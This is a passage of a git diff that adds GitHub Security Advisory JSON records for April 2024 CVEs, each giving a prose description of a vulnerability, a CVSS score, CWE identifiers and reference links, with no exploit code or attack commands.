"GHSA-29x8-vr7f-rwm6", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28908" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28908" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28908" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2f37-h53v-66vq/GHSA-2f37-h53v-66vq.json b/advisories/unreviewed/2024/04/GHSA-2f37-h53v-66vq/GHSA-2f37-h53v-66vq.json new file mode 100644 index 00000000000..32fc4af923d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2f37-h53v-66vq/GHSA-2f37-h53v-66vq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2f37-h53v-66vq", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49074" + ], + "details": "A denial of service vulnerability exists in the TDDP functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of network requests can lead to reset to factory settings. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49074" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1861" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1861" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-749" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2frh-5wq5-r279/GHSA-2frh-5wq5-r279.json b/advisories/unreviewed/2024/04/GHSA-2frh-5wq5-r279/GHSA-2frh-5wq5-r279.json new file mode 100644 index 00000000000..7b13da5e6ef --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2frh-5wq5-r279/GHSA-2frh-5wq5-r279.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2frh-5wq5-r279", + "modified": "2024-04-07T09:30:28Z", + "published": "2024-04-07T09:30:28Z", + "aliases": [ + "CVE-2024-30413" + ], + "details": "Vulnerability of improper permission control in the window management module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30413" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2gc3-gxvv-r87c/GHSA-2gc3-gxvv-r87c.json b/advisories/unreviewed/2024/04/GHSA-2gc3-gxvv-r87c/GHSA-2gc3-gxvv-r87c.json new file mode 100644 index 00000000000..dee17461441 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2gc3-gxvv-r87c/GHSA-2gc3-gxvv-r87c.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gc3-gxvv-r87c", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-27895" + ], + "details": "Vulnerability of permission control in the window module. Successful exploitation of this vulnerability may affect confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27895" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2gfj-2fgr-3hmh/GHSA-2gfj-2fgr-3hmh.json b/advisories/unreviewed/2024/04/GHSA-2gfj-2fgr-3hmh/GHSA-2gfj-2fgr-3hmh.json new file mode 100644 index 00000000000..814ab4d891b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2gfj-2fgr-3hmh/GHSA-2gfj-2fgr-3hmh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gfj-2fgr-3hmh", + "modified": "2024-04-06T12:30:56Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-25029" + ], + "details": "IBM Personal Communications 14.0.6 through 15.0.1 includes a Windows service that is vulnerable to remote code execution (RCE) and local privilege escalation (LPE). The vulnerability allows any unprivileged user with network access to a target computer to run commands with full privileges in the context of NT AUTHORITY\\SYSTEM. This allows for a low privileged attacker to move laterally to affected systems and to escalate their privileges. IBM X-Force ID: 281619.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25029" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/281619" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7147672" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2jc9-36w4-pmqw/GHSA-2jc9-36w4-pmqw.json b/advisories/unreviewed/2024/04/GHSA-2jc9-36w4-pmqw/GHSA-2jc9-36w4-pmqw.json new file mode 100644 index 00000000000..2be96b9d24f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2jc9-36w4-pmqw/GHSA-2jc9-36w4-pmqw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jc9-36w4-pmqw", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26256" + ], + "details": "libarchive Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26256" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26256" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2jr3-vfc4-xrm2/GHSA-2jr3-vfc4-xrm2.json b/advisories/unreviewed/2024/04/GHSA-2jr3-vfc4-xrm2/GHSA-2jr3-vfc4-xrm2.json new file mode 100644 index 00000000000..d888b7f9e76 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2jr3-vfc4-xrm2/GHSA-2jr3-vfc4-xrm2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jr3-vfc4-xrm2", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28937" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28937" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28937" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2p66-2g75-qw5g/GHSA-2p66-2g75-qw5g.json b/advisories/unreviewed/2024/04/GHSA-2p66-2g75-qw5g/GHSA-2p66-2g75-qw5g.json new file mode 100644 index 00000000000..9963c23d647 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2p66-2g75-qw5g/GHSA-2p66-2g75-qw5g.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2p66-2g75-qw5g", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2543" + ], + "details": "The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_uri_editor' function in all versions up to, and including, 2.4.3.1. This makes it possible for unauthenticated attackers to view the permalinks of all posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2543" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/a248426dfee107c6fda08e80f98fa894" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3053899" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/74f6bf42-3406-47c5-b255-6cc1e8084fb5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2p97-c8vf-r4rf/GHSA-2p97-c8vf-r4rf.json b/advisories/unreviewed/2024/04/GHSA-2p97-c8vf-r4rf/GHSA-2p97-c8vf-r4rf.json new file mode 100644 index 00000000000..550bc67b488 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2p97-c8vf-r4rf/GHSA-2p97-c8vf-r4rf.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2p97-c8vf-r4rf", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-26574" + ], + "details": "Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26574" + }, + { + "type": "WEB", + "url": "https://filmora.wondershare.com" + }, + { + "type": "WEB", + "url": "https://github.com/Alaatk/CVE-2024-26574/tree/main" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2pg5-q29v-6rxq/GHSA-2pg5-q29v-6rxq.json b/advisories/unreviewed/2024/04/GHSA-2pg5-q29v-6rxq/GHSA-2pg5-q29v-6rxq.json new file mode 100644 index 00000000000..1ee7e2ff74d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2pg5-q29v-6rxq/GHSA-2pg5-q29v-6rxq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2pg5-q29v-6rxq", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26214" + ], + "details": "Microsoft WDAC SQL Server ODBC Driver Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26214" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26214" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2q57-cgm5-3xfx/GHSA-2q57-cgm5-3xfx.json b/advisories/unreviewed/2024/04/GHSA-2q57-cgm5-3xfx/GHSA-2q57-cgm5-3xfx.json new file mode 100644 index 00000000000..6091b2e8dff --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2q57-cgm5-3xfx/GHSA-2q57-cgm5-3xfx.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q57-cgm5-3xfx", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-3424" + ], + "details": "A vulnerability classified as critical has been found in SourceCodester Online Courseware 1.0. Affected is an unknown function of the file admin/listscore.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259596.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3424" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-09.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259596" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259596" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311602" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T16:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2r5m-mx77-x6w5/GHSA-2r5m-mx77-x6w5.json b/advisories/unreviewed/2024/04/GHSA-2r5m-mx77-x6w5/GHSA-2r5m-mx77-x6w5.json new file mode 100644 index 00000000000..5baee82b1de --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2r5m-mx77-x6w5/GHSA-2r5m-mx77-x6w5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2r5m-mx77-x6w5", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2664" + ], + "details": "The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown Widget in all versions up to, and including, 4.10.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2664" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055384%40premium-addons-for-elementor&new=3055384%40premium-addons-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb7e94c-385e-4ce9-acfa-978403047159?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2r7g-574g-5j65/GHSA-2r7g-574g-5j65.json b/advisories/unreviewed/2024/04/GHSA-2r7g-574g-5j65/GHSA-2r7g-574g-5j65.json new file mode 100644 index 00000000000..47dbe7faae2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2r7g-574g-5j65/GHSA-2r7g-574g-5j65.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2r7g-574g-5j65", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-2950" + ], + "details": "The BoldGrid Easy SEO – Simple and Effective SEO plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.6.14 via meta information (og:description) This makes it possible for unauthenticated attackers to view the first 130 characters of a password protected post which can contain sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2950" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/boldgrid-easy-seo/tags/1.6.15/includes/class-boldgrid-seo-admin.php?rev=3064911" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d502e617-a59f-4385-b050-3702a1b1ed7e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T04:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2v7w-h3hv-34rp/GHSA-2v7w-h3hv-34rp.json b/advisories/unreviewed/2024/04/GHSA-2v7w-h3hv-34rp/GHSA-2v7w-h3hv-34rp.json new file mode 100644 index 00000000000..9a6c9e02df1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2v7w-h3hv-34rp/GHSA-2v7w-h3hv-34rp.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2v7w-h3hv-34rp", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-3349" + ], + "details": "A vulnerability classified as critical was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259453 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3349" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-02" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259453" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259453" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310217" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T17:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2w3g-r4c9-2jp8/GHSA-2w3g-r4c9-2jp8.json b/advisories/unreviewed/2024/04/GHSA-2w3g-r4c9-2jp8/GHSA-2w3g-r4c9-2jp8.json new file mode 100644 index 00000000000..eb6a542c05b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2w3g-r4c9-2jp8/GHSA-2w3g-r4c9-2jp8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2w3g-r4c9-2jp8", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-27247" + ], + "details": "Improper privilege management in the installer for Zoom Desktop Client for macOS before version 5.17.10 may allow a privileged user to conduct an escalation of privilege via local access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27247" + }, + { + "type": "WEB", + "url": "https://www.zoom.com/en/trust/security-bulletin/zsb-24012" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2w9x-58hj-96v8/GHSA-2w9x-58hj-96v8.json b/advisories/unreviewed/2024/04/GHSA-2w9x-58hj-96v8/GHSA-2w9x-58hj-96v8.json new file mode 100644 index 00000000000..60d2a0afe3e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2w9x-58hj-96v8/GHSA-2w9x-58hj-96v8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2w9x-58hj-96v8", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-30699" + ], + "details": "A buffer overflow vulnerability has been discovered in the C++ components of ROS2 Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code or cause a denial of service (DoS) via improper handling of arrays or strings.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30699" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30699" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2x2m-2fw2-whqj/GHSA-2x2m-2fw2-whqj.json b/advisories/unreviewed/2024/04/GHSA-2x2m-2fw2-whqj/GHSA-2x2m-2fw2-whqj.json new file mode 100644 index 00000000000..759d5d9e5df --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2x2m-2fw2-whqj/GHSA-2x2m-2fw2-whqj.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x2m-2fw2-whqj", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2343" + ], + "details": "The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.11.6 via the form_to_url_action function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2343" + }, + { + "type": "WEB", + "url": "https://avada.com/documentation/avada-changelog" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/55d41870c7ce0e95f454d00100bc10dc" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/87ca07ac-6080-45d7-a8f5-74a918adec43?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2x49-6qmf-g5cq/GHSA-2x49-6qmf-g5cq.json b/advisories/unreviewed/2024/04/GHSA-2x49-6qmf-g5cq/GHSA-2x49-6qmf-g5cq.json new file mode 100644 index 00000000000..71507795db7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2x49-6qmf-g5cq/GHSA-2x49-6qmf-g5cq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x49-6qmf-g5cq", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2024-2224" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in the UpdateServer component of Bitdefender GravityZone allows an attacker to execute arbitrary code on vulnerable instances. This issue affects the following products that include the vulnerable component: \n\nBitdefender Endpoint Security for Linux version 7.0.5.200089\nBitdefender Endpoint Security for Windows version 7.9.9.380\nGravityZone Control Center (On Premises) version 6.36.1\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2224" + }, + { + "type": "WEB", + "url": "https://www.bitdefender.com/support/security-advisories/privilege-escalation-via-the-gravityzone-productmanager-updateserver-kitsmanager-api-va-11466" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T13:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2xw4-7mq9-jfcm/GHSA-2xw4-7mq9-jfcm.json b/advisories/unreviewed/2024/04/GHSA-2xw4-7mq9-jfcm/GHSA-2xw4-7mq9-jfcm.json new file mode 100644 index 00000000000..fc3bde1d06d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2xw4-7mq9-jfcm/GHSA-2xw4-7mq9-jfcm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xw4-7mq9-jfcm", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-31492" + ], + "details": "An external control of file name or path vulnerability [CWE-73] in FortiClientMac version 7.2.3 and below, version 7.0.10 and below installer may allow a local attacker to execute arbitrary code or commands via writing a malicious configuration file in /tmp before starting the installation process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31492" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-345" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T13:51:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-324f-c4g7-9r7j/GHSA-324f-c4g7-9r7j.json b/advisories/unreviewed/2024/04/GHSA-324f-c4g7-9r7j/GHSA-324f-c4g7-9r7j.json new file mode 100644 index 00000000000..73a8dbe46de --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-324f-c4g7-9r7j/GHSA-324f-c4g7-9r7j.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-324f-c4g7-9r7j", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3524" + ], + "details": "A vulnerability, which was classified as problematic, has been found in Campcodes Online Event Management System 1.0. This issue affects some unknown processing of the file /views/process.php. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259895.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3524" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Online%20Event%20Management%20System/Online%20Event%20Management%20System%20-%20vuln%203.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259895" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259895" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312506" + } + ], + "database_specific": { + "cwe_ids": [ + 